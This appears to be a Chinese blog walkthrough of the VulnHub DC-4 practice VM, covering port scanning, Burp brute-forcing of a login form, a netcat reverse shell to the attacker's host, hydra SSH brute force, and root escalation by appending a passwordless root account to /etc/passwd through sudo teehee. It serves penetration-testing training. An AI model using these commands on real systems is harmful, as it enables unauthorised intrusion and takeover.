VulnHub通关日记-DC_4-Walkthrough

• 2020 年 3 月 6 日
• 筆記

VulnHub通关DC_4-Walkthrough

靶机介绍

DC-4是另一个专门构建的易受攻击的实验室，目的是在渗透测试领域积累经验。

与以前的DC版本不同，此版本主要为初学者/中级用户设计。只有一个标志，但是从技术上讲，有多个入口点，就像上次一样，没有任何线索

靶机地址：https：//www.vulnhub.com/entry/dc-4,313/

这边靶机和前一个是一样的，只需要获取一个Flag就行了，在/root目录下！

学习到的知识

Burpsuite枚举弱密码命令执行反弹shellhydra爆破ssh teehee权限提升

信息搜集

拿到IP先对它进行端口扫描：

nmap -A -T4 192.168.1.100

图片

这边扫描出来靶机开放了22（ssh），80（http）端口，先从80端口来入侵：

http://192.168.1.100/

图片

Burpsuite枚举弱密码

：后发现是一个登陆的页面，我尝试了常规的弱口令admin，admin123无果，随后我又尝试了一遍SQL注入，并没有注入点！这个时候就需要掏出我的字典来了来配合Burp爆破：

POST /login.php HTTP/1.1  Host: 192.168.1.100  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  Referer: http://192.168.1.100/  Content-Type: application/x-www-form-urlencoded  Content-Length: 30  Connection: close  Cookie: PHPSESSID=lddqa4ven9a9qqf8ua9tlurj35  Upgrade-Insecure-Requests: 1    username=admin&password=§123456§

burp枚举弱密码1

burp枚举弱密码2

爆破成功后得到密码happy，随后携带账号和密码登陆到了后台，在后台发现可以执行查看文件的操作：

执行查看文件操作

命令执行反弹shell

这个时候想到了命令执行，whoami看了看权限是一个网站普通权限：

whoami回显

我们先用nc反弹一个shell回来把，kali监听4444端口，在radio变量输入nc反弹的地址成功反弹一枚shell：

nc -e /bin/sh 192.168.1.128 4444

反弹壳

我们先让它得到一个bash把：

python -c 'import pty;pty.spawn("/bin/bash")'

hydra爆破ssh

之后我是在/home/jim目录里发现了一个历史密码的备份文件：

历史密码备份文件

既然得到了密码，就那么用九头蛇来爆破把：

hydra -l jim -P pass ssh://192.168.1.100 -t 10

九头蛇爆破

爆破成功后得到jim的密码为jibril04，后来我登陆到了jim用户：

ssh [email protected]

ssh链接

登陆之后我习惯性的sudo -l发现需要密码：

须藤-l回显

紧接着我在jim的目录下发现了一个文件，文件里好像是一封邮件信息：

From root@dc-4 Sat Apr 06 20:20:04 2019  Return-path: <root@dc-4>  Envelope-to: jim@dc-4  Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000  Received: from root by dc-4 with local (Exim 4.89)          (envelope-from <root@dc-4>)          id 1hCiQe-0000gc-EC          for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000  To: jim@dc-4  Subject: Test  MIME-Version: 1.0  Content-Type: text/plain; charset="UTF-8"  Content-Transfer-Encoding: 8bit  Message-Id: <E1hCiQe-0000gc-EC@dc-4>  From: root <root@dc-4>  Date: Sat, 06 Apr 2019 20:20:04 +1000  Status: RO    This is a test.  

邮件信息

好像没得啥子用处！最后我在邮箱目录找到了另一封邮件：

另一篇邮件信息

读完这封邮件我得到了charles告诉jim的一个重要信息，也就是charles的密码！

charles：^xHhA&hvim0y

获取到密码后我切换到了charles用户：

su charles  ^xHhA&hvim0y

切换charles用户

teehee权限提升

切换用户之后我又是习惯性的sudo -l发现charles用户可以以root身份去运行teehee命令：

用root身份身份运性teehee命令

我紧接着写入了一个账号saul到passwd里：

echo "saul::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  #注释：  #[用户名]：[密码]：[UID]：[GID]：[身份描述]：[主目录]：[登录shell]

写入passwd拿到标志

最后也是在/root目录下拿到了Flag〜